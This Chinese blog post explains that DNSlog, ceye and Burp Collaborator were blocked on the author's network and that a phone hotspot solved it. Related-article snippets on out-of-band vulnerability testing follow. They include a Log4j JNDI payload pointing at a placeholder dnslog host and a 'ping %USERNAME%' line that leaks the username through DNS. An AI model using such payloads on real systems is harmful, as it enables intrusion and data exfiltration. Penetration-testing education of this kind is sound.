DNSlog,ceye,burp collaboration无法访问

原创 已于 2023-10-10 10:06:07 修改 · 2.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #windows #网络协议

于 2022-03-08 10:24:14 首次发布
本文讲述了如何通过手机热点解决网络设备墙问题,使得DNSlog、ceye和burpcollaboration等工具得以正常访问。

DNSlog,ceye,burp collaboration一直无法访问

其实就是被当前网络下的设备墙了,用手机开热点就解决了。

《WEB安全渗透测试》(28)Burp Collaborator-dnslog外带技术
午夜安全
08-01 3117
1)打开BurpSuite,第一步选择“Projectoptions”,第二步选择“Misc”,第三步选择“UsethedefaultCollaboratorserver”(使用默认配置的外带服务器,如果想使用自己的服务器,可以在下面自由配置),第四步点击“Runhealthcheck..”测试外带服务器是否可以正常工作。这两个平台,他们是免费的DNSlog平台,我们利用它们可以监控DNS解析记录和HTTP访问记录,这对我们验证一些漏洞非常有帮助。...
DNSlog漏洞探测
2301_80661529的博客
03-16 2897
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
利用DNSLOG获取看不到的信息(给盲注带上眼镜)
wodafa的博客
04-27 3343
毕业设计总算搞得差不多了,这个心累啊。 这不,完成了学校的任务,赶紧回来给蛋总交作业。 今天给大家分享一个姿势吧,不是什么新东西,但比较少见——用DNS log来获取回显。
[NOTE] 关于DNSLog平台的使用
qq_43266093的博客
12-10 4694
[NOTE] 关于DNSLog平台的使用 前言 起因是12.09午夜的Log4j核弹级漏洞 大家验证漏洞的payload:${jndi:idap://XXXX.dnslog.cn/aa} 发现大家用的都是DNSLog,而自己还不太懂这个 于是发现自己还是真的菜 就赶紧补一波 所以说什么时候自己租个服务器 DNSLog Platform 现如今的DNS解析一般是一个递归+迭代解析的过程: 粉->蓝->黄->绿->红 其中我们可以自己建立一个红色的服务器,接收记录每次的DNS请求 可以
DNSlog注入学习(靶场测试全流程)
00勇士王子的博客
04-18 1522
原理: 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。 DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息 利用场景: 在sql注入时为布尔盲注、时间盲注,注入的效率
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang 相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键! 部署 克隆或者下载本仓库到你的服务器上 不多说。 决定是否开放公网访问? 倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil) 域名准备 做好NS指向即可。不会检查请看后文 尝试运行 ~~
ceye-dnslog
weixin_55885866的博客
01-14 857
检查是否为 http://detectportal.firefox.com/success.txt。print(f"发生错误: {err}")# 创建一个新的参数字典,用于更改参数。开始后测试每个参数 后查看ceye平台看看是否出现问题。# 返回,不继续处理此请求。# 检查请求是否成功。# 更改当前参数的值。# 打印更改后的参数。# 在这里添加处理响应的逻辑。# 启动mitmproxy代理服务器。
总结:burp无法代理,连接不上网络问题的7个原因
热门推荐
weixin_43652669的博客
03-09 2万+
首要条件:.der的证书已经安装(安卓端为.cer) 检查其他条件: 本地代理设置了“不使用代理地址“:127.0.0.1&localhost; 本地代理尝试使用IP地址:XXX.XXX.XXX.XXX,而不是127.0.0.1&localhost; 代理tomcat可能存在端口冲突,检查端口是否存在冲突; 新版火狐需要设置允许本地代理: a. 浏览器输入:about:confi...
利用dnslogceye.io盲打
weixin_48776804的博客
07-21 2359
利用dnslogceye.io
Burpsuite-UAScan:burpsuite插件:被动进行未授权访问扫描
05-23
Burpsuite插件:被动方式进行未授权访问漏洞(越权)的扫描 被动扫描经过Burpsuite的每一个请求 通过修改Cookie头重新访问判断是否存在未授权访问(越权)问题 如果扫描到未授权访问的URL会显示到空白区域中 采用...
BurpSuite下载
11-27
Burp Suite 是一款功能强大的集成化网络应用程序安全测试工具,它广泛应用于安全行业的渗透测试工作中。该工具集成了多种用于网络应用攻击的功能,主要包括:扫描器、监听器、Intruder、Repeater、Decoder、Comparer...
dnslog盲打学习
..
02-27 3568
前言 在渗透或者ctf中,我们可能会遇到一些没有回显的漏洞,这个时候可以通过dnslog来判断存不存在漏洞,并且得到漏洞执行的结果。 什么是dnslog dns是在我们输入一个域名如A.com时,会通过DNS把域名解析为ip,靠着dns解析到真正的ip地址127.0.0.1,这样子才能访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。 可以通过这篇文章好好
DNS与DNSLog
qq_45675619的博客
05-11 2563
这里写目录标题DNS简介解析过程DNSLog简介ceye的使用DNSLog注入SQL盲注 DNS 简介 DNS(Domain Name System),也就是域名系统。将域名与IP地址相互映射的一个分布式数据库。DNS使用UDP端口53。 域名解析的过程就是将域名去DNS服务器的数据库中寻找,这是比较耗费时间的。为了提高上网速度,运营商一般在他们的DNS服务器中缓存了许多的DNS记录,再根据用户所在地进行网络分配。这样用户打开网页则不需要去查询DNS数据库,而是直接使用缓存的DNS记录。 解析过程 大致流程
DNSLog漏洞探测
weixin_64359465的博客
04-04 793
例如:ping %USERNAME%.xxx.dnslog.cn。secure_file_priv参数。MySQL load_file函数。WindowsDNSLog利用。CVE漏洞中DNSLog的使用。Linux下DNSLog利用。Windows环境变量大全。二、常用DNSLog平台。注意使用HTTP协议访问。账号信息profile。ceye.io使用方法。三、Web漏洞实战案例。一、DNSLog介绍。DNSLog注入步骤。
DNSlog使用
shangMD01的博客
12-04 1113
打开dnslog平台: 点击Get SunDomain获取域名并复制: 复制完打开新网页并粘贴在url上访问,在DNSlog网页内刷新,就会出现一条DNS记录:
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 7507
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台,DNSLog的平台非常的多,但是实际上大部分的DNSLog的平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
小白的CTF之路之DNSlog注入
glass_york的博客
01-07 1392
dnslog注入,sqlilabs第九关
渗透实录-02
qq_32660043的博客
12-22 504
一次渗透实录。
插件分享 | 来检测带外(Out-of-Band)流量的Ceye
m0_46699477的博客
03-22 5470
它的使用场景主要是在一些不能直接表明攻击是否成功的漏洞利用的过程中,通过使用 CEYE 平台提供的域名,结合诸如 DNS、HTTP 之类的带外信道来得到我们想要的回显信息,从而达到对漏洞的检测。
burp实验室访问控制
最新发布
07-27
访问控制测试是Web安全测试中的重要部分,Burp Suite 提供了多种功能来帮助测试人员识别和利用访问控制漏洞。以下是一些常见的测试方法和步骤: ### 1. 水平访问控制测试 水平访问控制通常涉及同一用户角色的不同用户之间的资源访问限制。例如,普通用户不应能够访问其他用户的私有数据。 - **使用Intruder模块**:可以通过Intruder模块来自动化测试水平访问控制漏洞。将用户标识符(如用户ID)设置为攻击参数,并尝试不同的值以查看是否可以访问其他用户的资源。 ```http GET /user/profile?id=1 HTTP/1.1 Host: example.com ``` 在Intruder中,将`id=1`设置为攻击参数,并使用一个包含多个用户ID的列表作为攻击载荷。观察响应以确定是否存在访问控制漏洞[^3]。 ### 2. 垂直访问控制测试 垂直访问控制涉及不同用户角色之间的权限差异。例如,普通用户不应能够执行管理员级别的操作。 - **手动测试**:尝试访问只有高权限用户才能访问的URL或API端点。例如,尝试访问管理员面板的URL,并观察是否能够成功访问。 ```http GET /admin/dashboard HTTP/1.1 Host: example.com ``` - **使用Proxy模块**:通过Proxy模块拦截和修改请求,尝试更改请求中的用户角色或权限标识符,以测试是否存在垂直访问控制漏洞[^3]。 ### 3. 使用Scanner模块 Burp Suite的Scanner模块可以自动检测常见的访问控制漏洞。只需将目标URL发送到Scanner模块,Burp Suite会自动分析并报告潜在的安全问题。 ### 4. 使用Repeater模块 Repeater模块允许手动测试单个请求,非常适合用于测试访问控制漏洞。可以通过修改请求参数、头部或Cookie来测试不同的访问场景。 ```http GET /user/data HTTP/1.1 Host: example.com Cookie: session=abc123 ``` 在Repeater中,可以修改`session` Cookie的值或添加新的头部以测试不同的用户会话[^2]。 ### 5. 使用Logger模块 Logger模块可以记录所有经过Burp Suite的请求和响应,适合用于监控和分析访问控制相关的流量。 ### 6. 使用Extender模块 通过安装扩展,可以增强Burp Suite的功能。例如,某些扩展可以帮助自动化测试访问控制漏洞或提供更详细的分析功能[^4]。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值